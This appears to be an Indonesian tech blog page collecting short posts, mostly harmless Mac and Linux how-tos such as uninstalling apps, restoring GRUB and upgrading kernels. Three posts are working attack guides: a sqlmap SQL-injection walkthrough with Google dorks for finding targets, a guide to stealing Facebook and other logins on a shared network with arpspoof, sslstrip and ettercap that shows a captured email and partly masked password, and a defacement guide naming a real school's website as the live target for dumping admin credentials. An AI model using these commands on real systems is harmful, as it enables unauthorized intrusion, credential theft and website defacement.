Loading...

Cara Uninstall Aplikasi di Mac OS X

0

Mungkin Bagi anda pengguna Baru Mac OS X bingung dengan Cara uninstall Aplikasi. Apalagi anda terbiasa menggunakan Windows. Jika di windows cara uninstall Aplikasi hanya dengan Masuk di Control Panel, Tapi berbeda dengan OS X di sebabkan OS X tidak memiliki Control Panel seperti Windows.

Jika ingin menginstall Aplikasi di OS X hampir sama dengan menginstall Aplikasi di windows yaitu dengan cara double klik file .DMG kemudian Mengklik Next-next dan terkahir biasanya anda di arahkan untuk memindahkan Aplikasi ke sebuah Folder dan Aplikasi tersebut sudah terinstall.

Kenapa anda harus Tahu bagaimana mengUninstall Aplikasi di OS X? Karena ini tidak seperti cara uninstall Aplikasi di Windows dengan “Uninstall Programs”. bisa jadi juga anda banyak meninstall Aplikasi-Aplikasi yang sebenarnya anda tidak butuhkan di OS X anda, ini juga bisa mempengaruhi performa dan kecepatan Mac anda. Sebaiknya hapus/Uninstall Aplikasi yang tidak anda perlukan.

Disini saya akan menjelaskan 3 Cara yang di Gunakan Untuk Uninstall Aplikasi di Mac OS X. Sebenarnya Masih ada beberapa Cara lagi Tapi disini saya hanya membahas 3 Saja. Mungkin di Postingan berikutnya kita akan bahas tuntas Cara lainya. 

Cara Uninstall Aplikasi di Mac OS X :


1. Uninstall Aplikasi melalui LaunchPad

Bisa di Bilang Cara ini lebih Simple, Anda hanya membuka LaunchPad dengan Cara menekan Tombol F4 Pada keyboard kemudian Klik dan Tahan Salah satu Aplikasi yang ada di LaunchPad sampai icon Aplikasi tersebut bergoyang ( Jinggle), dan Klik Tanda "X" yang berada di sudut kanan atas icon Aplikasi. Secara Otomatis tampil sebuah Pop Up pemberitahuan "Are You Sure Want Delete The Application?" Klik "Delete" untuk medeletenya. Tapi kekurangan cara ini Yaitu tidak semua Aplikasi bisa anda delete/Uninstall menggunakan Cara ini.


2.   Melalui Folder Aplikasi

Cara ini Juga termasuk Gampang, Buka Finder - Applications - dan klik kanan Aplikasi yang ingin anda Delete/Uninstall kemudian Pilih "Move To Trash" dan Aplikasi secara otomatis akan TerDelete/Uninstall.

3.  Menggunakan Aplikasi Pihak ketiga yaitu AppZapper.

Ini menggunakan Aplikasi dari Appstore, Naman AppZapper, Jika anda memiliki sedikit Uang sebaiknya anda membeli Aplikasi ini, Harganya sekitar $12 saja. Bisa di bilang Aplikasi sangat bagus untuk mendelete/Uninstall Aplikasi anda, karena menghapus Aplikasi sampai bersih dari Akarnya. Cara menggunakannya Juga tidak sulit, Dengan Hanya membuka Aplikasi AppZapper dan mendrag/Drop Aplikasi yang ingin diUninstall ke AppZapper dan Klik ZAP atau di tampilan AppZapper anda juga bisa memilih Aplikasi mana yang ingin anda hapus Tanpa Drag/Drop Aplikasi.

Namun jika anda salah mengUninstall Aplikasi anda bisa mengembalikan Aplikasi tersebut, Dengan Cara Buka "Trash" dan Klik Kanan Aplikasi tersebut, kemudian Pilih Put Back this app.

Selamat mencoba ^_^
Mengembalikan Boot Grub Ubuntu Setelah Install Ulang Windows

Mengembalikan Boot Grub Ubuntu Setelah Install Ulang Windows

0
Bagi kalian yang masih menggunakan dual boot, biasanya windows dan linux, adalah dengan menginstal windows terlebih dahulu baru kemudian menginstal linux. Karena boot loader linux akan mengenali windows sebagai other OS, sedangkan jika sebaliknya, muncullah satu kesombongan windows yaitu menimpa boot loader linux, dan tidak mau mengenalinya sebagai other OS. Jangan khawatir, disini saya ingin berbagi ilmu dengan kalian. Meskipun instal ulang windows dan menimpa boot loader linux, kita tidak perlu menginstal ulang linux kita, cukup dengan menginstal ulang boot loader kita kembali.


1. Masukkan CD linux anda
2. Setelah muncul desktop, buka terminal
3. Lihatlah di Device mana anda menginstall linux anda
    $ sudo fdisk -l
4. Setelah anda mengetahui device mana yang terinstal, misalnya  /dev/sda7, maka ketikkanlah perintah berikut ini di terminal :
$ sudo mount -t ext4 /dev/sda7 /mnt/
$ sudo mount -t proc proc /mnt/proc/
$ sudo mount -t sysfs sys /mnt/sys/
$ sudo mount -o bind /dev/ /mnt/dev/
$ sudo chroot /mnt /bin/bash
$ grub-install /dev/sda
$ grub-install /dev/sda7 --force

Nah, udah selesai deh. Tinggal reboot, dan grub anda kembali seperti sedia kala.

Salam Open Source.
[Linux] Connect Wifi Lewat Terminal

[Linux] Connect Wifi Lewat Terminal

0
Kalau biasanya kita connect ke wifi menggunakan wicd-network-manager dan network-manager, nah kali ini saya akan memberikan sedikit tips atau cara connect ke wifi lewat terminal, cara ini bisa berguna disaat wicd dan network-manager anda tdk berfungsi seperti biasanya (hank).

pertama-tama interface dari kartu jaringan anda harus di ‘UP’ dulu. biasanya sih wlanO, eth1 dll.
$ ifconfig “interface” up

kemudian scan untuk menemukan essid atau nama wifi.
$ iwlist “interface” scan

kurang lebih tampilannya seperti ini
Address: 54:E6:FC:FE:2B:F2
Channel:11
Frequency:2.462 GHz (Channel 11)
Quality=27/70  Signal level=-83 dBm
Encryption key:on
ESSID:”KPLI PALU”
Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s; 6 Mb/s
12 Mb/s; 24 Mb/s; 36 Mb/s
Bit Rates:9 Mb/s; 18 Mb/s; 48 Mb/s; 54 Mb/s
Mode:Master
Extra:tsf=000000688f832aef
Extra: Last beacon: 48ms ago
IE: Unknown: 000C544958204E4554204B4F5441
IE: Unknown: 010882848B960C183048
IE: Unknown: 03010B
IE: Unknown: 050400010000
IE: Unknown: 2A0102
IE: Unknown: 32041224606C
IE: WPA Version 1
Group Cipher : TKIP
Pairwise Ciphers (1) : TKIP
Authentication Suites (1) : PSK

Kebetulan disini Wifinya menggunakan WPA, cara connect ke wifi:
$ wpa_passphrase ‘namawifi’ password

Lanjut

$ wpa_passphrase ‘namawifi’ password > /etc/wpa_supplicant.conf

Lanjut

$ wpa_supplicant -Bd -Dwext -i ‘interface’ -c /etc/wpa_supplicant.conf

Jangan lupa di jadikan dhcp client dulu:
$ dhclient


Selamat ber'internetan ria :D

Sql Injection Menggunakan Sqlmap

0


ok langsung saja, tidak perlu banyak basa-basi lagi.

Cari target menggunakan google dorks:
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=

dan masih banyak lagi yang lainnya. Jika target sudah di temukan, buka sqlmap, lokasinya di: 
Application – Backtrack – Exploitation Tools – Web Exploitation Tools – Sqlmap

Pentest target menggunakan cara berikut:
python sqlmap.py -u http://www.dedetampan.com/catalog.php?id=129 --dbs

-u = url
--dbs = untuk mencari database

Output:
available databases [2]:
[*] dede
[*] information_schema

Jika sudah menemukan databasenya, lanjut dengan cara berikut:
python sqlmap.py -u http://www.dedetampan.com/catalog.php?id=129 -D dede --tables 

-D = nama database yang kita temukan tadi
--tables = mencari nama tables
Output:
Database: dede
[3 tables]
+------------------------------+
| access_log               |
| administrators        |
|  menus                     |

Jika sudah menemukan nama tables, lanjut dengan cara berikut:
python sqlmap.py -u http://www.dedetampan.com/catalog.php?id=129 -D dede -T administrators --columns

-T = nama tables
--columns = mencari nama columns

Output:
[2 columns]
+--------------+--------------+
| Column       | Type    |
+--------------+--------------+
| admin_login  | text |
| admin_passwd  | text |

Jika sudah menemukan nama columns, lanjut dengan cara berikut:
python sqlmap.py -u http://www.dedetampan.com/catalog.php?id=129 -D dede -T administrators -C admin_login --dump

Output:
+--+
| admin-login |
+--+
|dedetampan|

Jika sudah mendapatkan nama username, lanjut dengan mencari password dari username tersebut:
python sqlmap.py -u http://www.dedetampan.com/catalog.php?id=129 -D dede -T administrators -C admin_passwd --dump

Output:
+--+
| admin-passwd |
+--+
|tb-cyber|
nah kalau sudah begini, sekarang terserah kalian mau di buat apa website tersebut ^_^




Sumber : http://dedekpli.blogspot.com/2011/11/sql-injection-with-sqlmap.html

Install Wireless Broadcom di Backtrack 5 R1

0


Pada backtrack 5 final, wireless broadcom aman-aman saja, bahkan sudah suport injection dengan menggunakan kernel default 2.6.38. Namun pada backtrack 5 R1 yang menggunakan kernel default 2.6.39.4, driver wireless broadcom tidak di kenali, dan harus menginstall manual dengan cara seperti di bawah ini:

1. ln -s /usr/src/linux /lib/modules/2.6.39.4/build

2. cd /usr/src/

3. wget http://linuxwireless.org/download/compat-wireless-2.6/compat-wireless-2011-07-14.tar.bz2 

4. tar jxpf compat-wireless-2011-07-14.tar.bz2

5. wget http://www.backtrack-linux.org/2.6.39.patches.tar 

6. tar xpf 2.6.39.patches.tar

7. cd compat-wireless-2011-07-14

8. patch -p1 < ../patches/mac80211-2.6.29-fix-tx-ctl-no-ack-retry-count.patch

9. patch -p1 < ../patches/mac80211.compat08082009.wl_frag+ack_v1.patch

10. patch -p1 < ../patches/zd1211rw-2.6.28.patch 

11. patch -p1 < ../patches/ipw2200-inject.2.6.36.patch

12. make

13. make install

14. reboot

Hal-Hal Yang di Lakukan Setelah Install BackTrack 5

0


Berikut saya akan memberikan sedikit tips-tips yang harus dilakukan setelah menginstall backtrack 5. Secara default backtrack 5 tidak menyediakan office suite, multimedia, Codec, dll.
Hal yang pertama di lakukan adalah melakukan update/upgrade, tujuannya untuk memperbaharui system dan paket yang sudah terinstall sebelumnya, ketikkan perintah berikut di terminal.
$ apt-get update
$ apt-get upgrade

Install update-manager, lokasinya akan berada di System=>administration=> update manager
$ apt-get install update-manager



Synaptic Package Manager lokasinya berada di Applications=>System=>Administration=>Synaptic Packages Manager
$ apt-get install synaptic


Ubuntu-Software-Center lokasinya berada di Applications=>Ubuntu-software-Center
$ apt-get install software-center


LibreeOffice kalau di windows ada yang namanya microsoft office, di linux ada yang namanya LibreeOffice dan OpenOffice, berikut cara install LibreeOffice Via PPA.
$ add-apt-repository ppa:libreoffice/ppa
$ apt-get update
$ apt-get install libreoffice
GNOME:
$ apt-get install libreoffice-gnome
KDE:
$ apt-get install libreoffice-kde


Install Codec pemutar musik dan vidio
$ apt-get install ubuntu-restricted-extras


Pemutar Musik

GNOME
Audacious:
$ apt-get install audacious
Rhythmbox:
$ add-apt-repository ppa:webupd8team/rhythmbox
$ apt-get update
$ apt-get install rhythmbox

KDE
Amarok:
$ add-apt-repository ppa:kubuntu-ppa/backports
$ apt-get update
$ apt-get install amarok

Pemutar Video
VLC:
$ apt-get install vlc
DragonPlayer:
$ apt-get install dragonplayer


Screensaver

$ apt-get install gnome-screensaver


Semoga bermanfaat :)




Hacking Facebook Dengan Backtrack 5 R3

Hacking Facebook Dengan Backtrack 5 R3

0

Kali ini gw akan berbagi trick yaitu seperti judul yang telah disebutkan "Cara Hacking Facebook Menggunakan Backtrack 5 r3 . apa itu Backtrack? backtrack yaitu sebuah sistem operasi LINUX. oke dari pada penasaran pengen tau lebih jelasnya mari di simak dan di perhatikan betul perintah-perintahnya :

mula - mula anda masuk terminal, terus kalo udah masuk kita masuk ke root dulu dengan memberikan perintah ini sudo su-

Pertama-tama siapkan tool yang akan kita gunakan

- Arpspoof
- Sslstrip-0.9
- OS Linux 32 Bit

Setelah semua tool yang di butuhkan sudah tersedia lakukan langkah berikut (jika paket belum terinstal) :

1) Buka Terminal kemudian ketikkan : wget http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.9.tar.gz

2) Kemudian extract file dengan cara : tar zxvf sslstrip-0.9.tar.gz

3) Ok sekarang kita masuk ke dalam folder baru dari file yang telah kita extract tadi : cd sslstrip-0.9 

4) Dan untuk menginstal ketikkan : python setup.py install 

Lakukan langkah berikut ( Jika paket sudah terinstall )

Gunakan cara ini setiap kali jika ingin mencuri password lagi:

1) Pertama hidupkan terlebih dahulu port untuk memforward : echo ’1′ > /proc/sys/net/ipv4/ip_forward 

2) Kemudian cari gateway atau pintu dari jaringan yang akan kita sadap dengan cara : netstat -nr 

3) sekarang kita reset port http ke port 8080, ketikan : iptables -t nat -A PREROUTING -p tcp -
    destination-port 80 -j REDIRECT --to-port 8080 

4) Mulai menyadap dengn cara : arpspoof -i wlan0 192.168.0.1 ( 192.168.0.1) adalah gateway dari
    jaringan yang saya gunakan, gantilah gateway tersebut dengan gateway yang anda temukan dari
    netstat -nr tadi) 

5) Kemudian buka terminal baru lalu ketikkan  : sslstrip -l 8080 untuk mengaktifkan cookies yang akan
    kita baca 

6) Set up is complete!! Ok sekarang kita telah menyadap akses jaringan yang melewati gateway.

7) jika anda ingin melihat akses kemana sajakah itu gunakan perintah : tail -f sslstrip.log

8) dan saat ada seseorang melakuakn login entah facebook yahoo gmail atau apapun yang
    menggunakan username dan password. kita akan mengetahuinya.

karena akan memakan waktu yang cukup lama karena harus menunggu ada seseorang yang mlakukan login jadi kita harus bersabar. dan itupun akan muncul script yang cukup banyak. gunakan perintah
find "pass: (tanpa petik) agar kita lebih mudah menemukannya

HANYA UNTUK PENGETAHUAN, JANGAN DI SALAH GUNAKAN YA !

Nah ini dia contoh saat Scanning: Social Enginering Toolkit (SET)

root@bt:~# ettercap -T -q -i eth0

ettercap NG-0.7.3 copyright @2013 Neyfa Kamila

Listening on eth0... (Ethernet)

eth0 ->   00:1E:68:2E:73:4A   1.0.0.64   255.255.255.0

Privileges dropped to UID 65534 GID 65534...

12 plugins
39 protocol dissectors
33 ports monitored
7587 mac vendor fingerprint
1990 tcp OS fingerprint
2633 known services

Starting Unified sniffing...


Text only Interface activated...
Hit 'h' for inline help

HTTP : 69.63.180.174:80 -> USER: martin.alfath@yahoo.com
PASS: c****g
INFO: http://www.facebook.com/

Dan ini Salah 1 Akun Facebook yg berhasil Gw Jebol ..

Email: martin.alfath@yahoo.com
Password: c****g


Sengaja Sebagian Password Gw pake bintang..
agar tidak ada Pencurian.. 


Kalo Mau Liat Buktinya.. Buka Facebook kalian
trus Copas emailnya di Kotak Pencari Facebook..
klik Profile'a, lalu lihat status terbarunya  ^_^

Atau Bisa Klik Link Yg Menuju Profil'a disini:

http://www.facebook.com/fadlhana


Sumber : http://nemi.faa.im/hacking-facebook-dengan-backtrack-5-r3.xhtml

Cara Deface Website Sekolah Dengan SQL Map

0
Halo para sobat Hackinggroups, kali ini saya akan menulis tentang Cara Deface Dengan SQL Injection yang dikenal dengan teknik SQLmap di BackTrack. Tools ini sudah ada di dalam File .ISO pada BackTrack. Disini, saya menggunakan BackTrack 5 R3.

Pertama-tama, cari target yang vuln terhadap SQL Injection, berikut ini sedikit dork dari saya :
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:Pageid=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=

Dan masih banyak lagi dork bertebaran di Google. Dalam Tutorial kali ini, saya akan menggunakan target salah satu Sekolah yang ada di Sidoarjo.

http://www.sman2sidoarjo.sch.id/

Untuk mengetahui Website tersebut Vuln atau tidak, silahkan tambahkan tanda ‘ (petik satu) setelah atau sebelum nomor id tersebut, bisa juga dengan menambahkan tanda  - (minus) sebelum nomor id tersebut.

Contoh :
http://www.sman2sidoarjo.sch.id/beritaLengkap.php?id=5''
http://www.sman2sidoarjo.sch.id/beritaLengkap.php?id=’5
http://www.sman2sidoarjo.sch.id/beritaLengkap.php?id=-5

Jika target tersebut Vuln terhadap SQLi, maka akan muncul kira-kira seperti ini :


Jika sudah mendapatkan target, silahkan buka Terminal, kemudian ketikan perintah 
cd /pentest/database/sqlmap” (tanpa tanda petik) kemudian Enter.
Kemudian akan muncul seperti ini.

Kemudian untuk mencari nama database, ketikkan 
./sqlmap.py -u http://www.sman2sidoarjo.sch.id/beritaLengkap.php?id=5 --dbs” 
(tanpa tanda petik) kemudian Enter.

Kemudian akan muncul seperti ini :


Disana kita dapat menemukan 2 Database, yaitu information_schema dan sman2sidoarjo_sman2sda
Setelah kita mendapatkan Database tersebut, kita tulis “./sqlmap.py -u http://www.sman2sidoarjo.sch.id/beritaLengkap.php?id=5 -D namadatabase --tables” (tanpa tanda petik) kemudian Enter.

Setelah itu akan muncul beberapa Tabel.

Kemudian kita mencari Colums dengan cara mengetik “./sqlmap.py -u http://www.sman2sidoarjo.sch.id/beritaLengkap.php?id=5 -D namadatabase -T namatable --columns” (tanpa tanda petik) kemudian Enter.

Kemudian, untuk mengetahui isi dari Columns tersebut, kita ketikkan “./sqlmap.py -u http://www.sman2sidoarjo.sch.id/beritaLengkap.php?id=5 -D namadatabase -T namatable --dump” (tanpa tanda petik) kemudian Enter.


Nah, kita sekarang sudah menemukan User + Pass Administrator dari Website tersebut :D



Jika sudah mendapatkan User + Pass, pasti Anda tau kan yang harus dilakukan ?
Nah, tinggal cari Login Adminnya deh
Caranya banyak kok di Google

Sekian dulu dari saya, saya ucapkan Terimakasih Banyak :)
Untuk yang ingin belajar SQL Map, silahkan menggunakan live target http://www.sman2sidoarjo.sch.id/beritaLengkap.php?id=5

Salah Kaprah Tentang Linux dan Open Source

0

Linux, ya linux, siapa yang tidak kenal dengan linux, semua orang sudah mengenal linux ya walaupun hanya tau saja, dan tidak menggunakan sudah cukup di bilang 'kenal'.

Open Source, Seperti hal nya linux, sudah banyak orang tau tentang ini, tapi apa mereka tau bahwa banyak orang salah pengertian mengenai Linux dan Open Source ?  Simak berikut ini :


Linux dan Open Source itu Gratis
Bukan !! Linux dan Open Source itu bukan gratis, tapi ada yang gratis dan berbayar, ya terserah mereka (developer) kalau program nya bagus dan berqualitas, apa salah nya di jual ?, dan jika program nya mungkin di tujukan untuk Free (freedom : bebas) mungkin bisa mereka jual, atau memberikanya secara gratis.
Ada juga OS linux yang berbayar contoh nya :
Zorin OS Premium, Red Hat Enterprise, dan lain-lain

Linux Buat Hacker
STOP !, anda kebanyakan nonton film , karena linux di sini banyak macam, dan variant , tergantung kita menggunakan dan mendistribusikan ulang, mungkin yang anda liat di film-film itu adalah hanya tulisan bertebaran atau biasa di sebuat Code  , jadi bagi anda yang menggunakan Windows, jangan tuduh pengguna linux sebagai Hacker atau Cracker !  ya walaupun ada Distro Linux khusus untuk Hacker, contohnya :
Backtrack dan Kali Linux

Semua Program Linux adalah Open Source
Tidak semua Program Linux itu Open Source , Linux hanyalah kernel yang di satukan dengan berbagai macam Aplikasi , seperti Desktop Evironment, GDM, Light GDM, dll
ada juga program linux yang Close Source

Program Open Source Hanya Untuk Linux
tidak semua open source untuk linux, ada banyak program open source untuk BSD, MacOS, dan MS windows

Linux ya Linux, Windows ya Windows
Banyak orang yang meng-asumsikan Linux adalah pengganti windows, sebeneranya pendapat itu tidak sepenuhanya salah, mengingat pembajakan sudah semakin banyak, tapi yang salah kaprah adalah, Linux di perlakukan Seperti Windows, ya seperti windows, kok bisa ?, ini terjadi biasanya kepada orang yang baru masuk ke lingkungan Linux, mereka mati-matian install Wine, Play on linux , dsb , dan berusaha mati-matian install game di linux, setelah berhasil, mereka 'Kecewa' dengan grapich yang di tampilkan. dan kalau di linux masih menggunakan aplikasi windows, kenapa anda susah-susah pindah ke linux ?

Linux Hanya Untuk Server
siapa bilang ?, banyak distro linux yang menawarkan Desktop WAH !, ga percaya ?, coba deh , download atau review di Youtube apa itu Ubuntu, Fedora, Manjaro, dan BlankOn , kalian pengguna windows, siap2 tercengang melihat desktop effect nya

Distributor Linux Hanya di Luar Negeri
wah , ketinggalan info orang yang ngomong begini, apa gak malu tuh sama si BlankOn, Sundara OS, Clear OS, Manux Linux 

Cara-Membuka File *.sh, *.bin, *.run dan *.deb di Linux Backtrack

0


File *.sh untuk file installer ini cara instalasinya sebagai berikut : – masuk pada directory tempat file .sh disimpan – ketikkan perintah berikut pada terminal :
    sudo ./namafile.sh

File *.bin untuk file installer ini cara instalasinya sebagai berikut : – masuk pada directory tempat file .bin disimpan – ketikkan perintah berikut pada terminal :
    sudo chmod +x namafile.bin sudo ./namafile.bin 

File *.run untuk file installer ini cara instalasinya sebagai berikut : – masuk pada directory tempat file .run disimpan – ketikkan perintah berikut pada terminal :
     sudo chmod +x namafile.run sudo ./namafile.run 

File *.deb untuk file jenis ini, cukup klik 2 kali pada file yang bersangkutan, layaknya file *.exe pada OS windows.

NB : Masuk directory tempat file berada gunakan perintah :
       cd /nama-folder1/nama-folder2/dst
Upgrade Kernel Fedora

Upgrade Kernel Fedora

0
Untuk Fedora disini saya coba pada Fedora 17. Pertama-tama untuk build kernel from source ini, kita harus intall gcc-nya dahulu sebagai compilernya.
$ su
# yum install gcc

Setelah itu install juga pake tambahan yaitu ncurses development.
# yum install ncurses-devel

Lalu lakukan update sistem Fedoranya agar menjadi lebih fresh dengan perintah:
# yum update

Lalu sekarang selanjutnya adalah mendowload kernel sourcenya di sini http://kernel.org. Downloadlah kernel yang stabil di situs tersebut. Misal kernel yang di download adalah kernel 3.7.2 dan berapa pada direktory /home/usernamekamu/Downloadds.

Sekarang saatnya ekstrak kernel tadi yang berada di /home/user/Downloads ke /usr/src.
# tar -xvf /home/usernamekamu/Downloads/linux-3.7.2.tar.gz -C /usr/src/

Selanjutnya adalah menuju direktory kernelnya tadi yang ada di /usr/src.
# cd /usr/src/linux-3.7.2

Lalu selanjutnya adalah melakukan proses pengompilelan kernelnya.
# make mrproper

Lalu juga copy file config kernel yang sebelumnya. Contoh yang saya lakukan adalah copy config kernel-3.3.4 (kernel default fedora 17)
# cp /boot/config-3.3.4-5.fc17.i686 /usr/src/linux-3.7.2/.config

Nah sekarang saatnya mengedit confignya sesuai kebutuhan kita dan sesuai spesifikasi laptop kita. Untuk mengetahuinya silahkan baca-baca tentang lspci atau cpuinfo.
# make menuconfig
Kalau sudah selesai setting confignya jangan lupa di save.

Selanjutnya adalah proses pengompilan.
# make 
# make modules_install install

Dan yang terakhir adalah settings grubnya.
# grub2-set-default 2
# grub2-editenv list
# grub2-mkconfig -o /boot/grub2/grub.cfg
Login Fedora Tanpa Mode Grafis

Login Fedora Tanpa Mode Grafis

0

Pernah gak sih kalian ingin login di Fedora melalui mode command line? Seperti distro slackware yang secara default loginnya melalui mode cmd?

Disisi lain login dengan menggunakan cmd ini, lebih cepat dan lebih enteng daripada login melalui mode GUI, karena harus meload plymouth dulu.
Bagi yang ingin login dengan cmd, cukup rubah konfigurasi grubnya fedora di /etc/default/grub. Caranya: 
$ su
$ nano /etc/default/grub

Lalu apabila sudah terbuka tampilan file grubnya, coba ganti tulisan ini: 
GRUB_CMDLINE_LINUX_DEFAULT="quiet splash"
menjadi seperti ini GRUB_CMDLINE_LINUX_DEFAULT="" atau GRUB_CMDLINE_LINUX_DEFAULT="noquiet nosplash"

Setelah itu jangan lupa di save dan jalankan perintah ini: 
# grub2-mkconfig -o /boot/grub2/grub.cfg

Dan setelah selesai tanpa error, coba restart fedoranya dan pasti nanti akan login ke fedora dengan mode command line

7 Aplikasi Anak Bangsa Yang Mendunia

0
1. Mindtalk
Mindtalk merupakan social channel yang digunakan untuk berbagi dan berdidkusi dengan menggabungkan konsep forum dan juga mailing list.Kelebihan Mindtalk sendiri ialah Sebagai forum yang dinamis, user dapatmembuat kategori sesuai dengan kebutuhan yang mereka inginkan. Stream yang terdapat pada setiap kategori dapat bertautan dan berhubungan dengan kategori lain yang ditandakan dengan hashtag (#). saat ini sudah mempunyai user di lebih dari 208 negara.

2. Yooi
Yooi adalah aplikasi berbasis smartphone Android untuk menulis SMS menggunakan suara. Aplikasi ini memungkinkan pengguna menulis dan mengirim SMS menggunakan suara, tanpa perlu mengetik dengan keyboard. Yooi di desain khusus untuk pengguna yang berbahasa Indonesia. Yooi mampu mengenali suara penggunanya kemudian ditampilkan ke dalam bentuk teks tanpa harus terhubung koneksi Internet (offline).

3. Catfiz

Catfiz adalah messenger karya putra bangsa (PT Duniacatfish Kreatif Media). Setiap pengguna catfiz berhak mendapatkan sebuah PIN yang disebut Nomer Identitas Catfiz atau NIC. Aplikasi ini merupakan BBM-nya Android, karena diketahui bersama bahwa BBM itu untuk meng-invite seseorang harus menukar PIN BB dulu. Ini jejaring sosial"Catfiz" yang sudah diunduh di lebih dari 151negara & pengguna aktif di 73 negara.

4. PicStory
Aplikasi PicStory adalah aplikasi yang akan membuat sebuah cerita di foto anda dan dishare ke profil Social Platform BBM anda. Aplikasi edit foto serta juga berperan buat menggabungkan lebih dari satu foto dalam foto tunggal, atau kolase yang sudah di download lebih dari 25 juta X di BlackBerry World.

5. PicMix
Blackberry Picmix merupakan aplikasi gratis yang fitur utamanya adalah dengan menggabungkan beberapa gambar atau fotosekaligus dalam satu frame yang sama.Selain itu, kita dapat menambahkan berbagai tulisan sehingga kumpulan gambar tersebut menjadi terkesan seolah “bercerita” dan langsung dapat dibagi melalui facebook, twitter, BBM (Blackberry Messenger). Selain itu PicMix ini dapat beroperasi tidak hanya pada platform Blackberry saja melainkan jugaplatform Android dan iPhone juga. Kini mempunyai 9,5juta user.

6. Amazing Concert
Teknologi Windows® MultiPoint™
Mouse adalah rekayasa pemrograman komputer yang memungkinkan satu layar komputer dapat diakses sampai lebih dari 30 mouse sekaligus. Satu komputer dapat digunakan oleh 30 anak dalam satu kelas dengan masing-masing anak menggunakan mouse untuk menjalankan aplikasi secara bersama-sama. PT Pesona Edukasi mengembangkan peranti lunak Amazing Concert, yakni satu aplikasi peranti lunak pendidikan ”bermain musik bersama”. Selain itu, ada juga DigiCarnival, yakni peranti lunak belajar matematika dengan topik mengurutkan angka, dan Monkey Rescue, yakni peranti lunak belajar bahasa dan pengetahuan umum yang dikemas seperti permainan hangman.

7. Icon Pop Quis
Permainan ini menguji pengetahuan umum pemain tentang judul film dan serial televisi, karakter-karakter fiksi dan tokoh-tokoh terkenal di dunia. Pemain ditantang untuk dapat menjawab dengan benar, berdasarkanpetunjuk gambar minimalis. Permainan kuis sederhana ini telah berhasil menduduki peringkat atas klasmen "Top Free" di App Store banyak negara di dunia. Bahkan sempat menududki dan bertahan di posisi 1 pada negara-negara seperti Inggris, Australia, Kanada, Filipina dan Indonesia. Dalam waktu satu bulan, Icon Pop Quiz telah dimainkan oleh 1,2 juta pengguna iOS di berbagai belahan dunia, di mana 25 ribu di antaranya adalah pemain dari Indonesia. Selain di iOS, game keren ini sudah tersedia di Andorid.


Semoga bacaan bacaan ini bermanfaat,  selamat mencoba..

Mengatasi Masalah VGA Pada Backtrack 5 R3

0


Nah bagaimana cara memperbaikinya? 
langsung saja berikut cara memperbaiki masalah tersebut.

1. Pastikan Anda terhubung ke Internet (karena kita akan langsung menginstall driver VGA nya)
kalau tidak terkonek ke internet, besok-besok aja deh d perbaiki msalah ini.hehe

2. Edit file xorg.conf
root@bt:~# gedit  /etc/X11/xorg.conf

3. Pada section device, ubah kata "vesa" menjadi"intel" Kemudian Save.

4. Install driver VGA

root@bt:~# apt-cache search intel | grep xor
root@bt:~# apt-get install xserver-xorg-video-intel
root@bt:~# apt-get install xserver-xorg-video-intel-dbg
root@bt:~# apt-get install xserver-xorg-video-i740
  


5. Edit grub dengan perintah berikut:
root@bt:~# gedit /boot/grub/grub.cfg
Cari kata "text splash vga=791" dan edit menjadi "text i915.modeset"  kemudian save.

6. Restart computer
root@bt:~# reboot

Ok selesai.. :D
Sudah saya coba dan 100% berhasil
Cara Mempercepat Koneksi Internet di Linux Ubuntu / Backtrack

Cara Mempercepat Koneksi Internet di Linux Ubuntu / Backtrack

0

Mungkin bagi sebagian orang merasa kesal apabila sedang berselancar di internet namun koneksinya sangat lambat, malam ini saya ingin berbagi cara mempercepat koneksi internet di linux. cara ini telah dicoba di Backtrack 5 R2 dan cukup terasa perbedaannya, tidak perlu takut untuk mencobanya karena kita bisa mem'backup konfigurasi aslinya apabila dirasa cara ini tidak efektif :)

Oke langsung saja kita mulai, buka konsole dengan menekan CTRL+ALT+T
Pertama kita back-up file aslinya dulu dengan ketik:
root@bt:~#sudo cp /etc/sysctl.conf  /etc/sysctl.conf.backup

jadi setting aslinya terdapat pada  /etc/sysctl.conf. Backup jika suatu saat ingin dikembalikan tinggal dicopy ke directory aslinya.

sekarang ketikkan perintah:
root@bt:~#sudo gedit /etc/sysctl.conf

copy paste kode berikut ini di akhir file yang kita edit:

# increase TCP max buffer size setable using setsockopt()
net.core.rmem_max = 16777216
net.core.wmem_max = 16777216
# increase Linux autotuning TCP buffer limits
# min, default, and max number of bytes to use
# set max to at least 4MB, or higher if you use very high BDP paths
net.ipv4.tcp_rmem = 4096 87380 16777216
net.ipv4.tcp_wmem = 4096 65536 16777216
# don't cache ssthresh from previous connection
net.ipv4.tcp_no_metrics_save = 1
net.ipv4.tcp_moderate_rcvbuf = 1
# recommended to increase this for 1000 BT or higher
net.core.netdev_max_backlog = 2500
# for 10 GigE, use this, uncomment below
# net.core.netdev_max_backlog = 30000
# Turn off timestamps if you're on a gigabit or very busy network
# Having it off is one less thing the IP stack needs to work on
#net.ipv4.tcp_timestamps = 0
# disable tcp selective acknowledgements.
net.ipv4.tcp_sack = 0
#enable window scaling
net.ipv4.tcp_window_scaling = 1

Simpan kemudia exit.
Ketikkan perintah berikut untuk apply:
root@bt:~#sudo sysctl -p 

Sekarang coba berinternet dan nikmati perubahannya.
Sekian, semoga bermanfaat ^_^

Mengenali Penyebaran Virus di komputer Windows

0


Kita tahu bahwa komputer ber-sistem operasikan Windows sangat rentan terhadap virus. Meskipun kita berpindah ke sistem operasi lain, belum menjamin bahwa kita bebas dari namanya Virus. Untuk mengenali bagaimana virus tersebut menyebar penulis akan memaparkankannya sebagai berikut.

1. Internet
